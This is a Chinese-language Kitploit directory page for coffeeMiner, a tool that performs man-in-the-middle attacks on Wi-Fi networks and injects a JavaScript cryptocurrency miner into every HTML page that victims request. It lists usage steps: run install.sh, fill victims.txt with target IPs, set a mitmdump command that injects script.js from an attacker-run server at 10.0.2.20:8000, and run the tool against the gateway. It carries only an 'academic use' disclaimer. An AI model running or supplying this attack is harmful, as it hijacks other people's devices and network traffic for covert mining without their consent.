Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
coffeeMiner — Wi-Fi网络中的协作式(mitm)加密货币矿池 | Kitploit
工具/GitHubGitHub/arnaucube/coffeeminer
Web应用程序漏洞利用渗透测试学习与教育红队
GitHubarnaucube/coffeeminer

coffeeMiner

Wi-Fi网络中的协作式(mitm)加密货币矿池

查看仓库网站
1.1k2688年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CoffeeMiner

在WiFi网络中的协作式(mitm)加密货币挖矿池

警告:本项目仅供学术/研究使用。

关于该项目的博客文章可在此阅读:http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

coffeeMiner

概念

  • 对所有选定的受害者执行MITM攻击
  • 在所有受害者请求的HTML页面中注入一个js脚本
  • 注入的js脚本包含一个加密货币矿工
  • 所有连接到局域网(LAN)的受害设备都将为CoffeeMiner进行挖矿

使用

  • install.sh
root@kitploit:~
bash install.sh
  • 编辑 victims.txt,每行一个IP
  • 编辑 coffeeMiner.py 的第28行,使用 coffeeMiner httpserver IP:
root@kitploit:~
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • 运行 coffeeMiner.py
root@kitploit:~
python3 coffeeMiner.py ipgateway

network

关于学术场景的完整说明,请参见 https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

demo

下载工具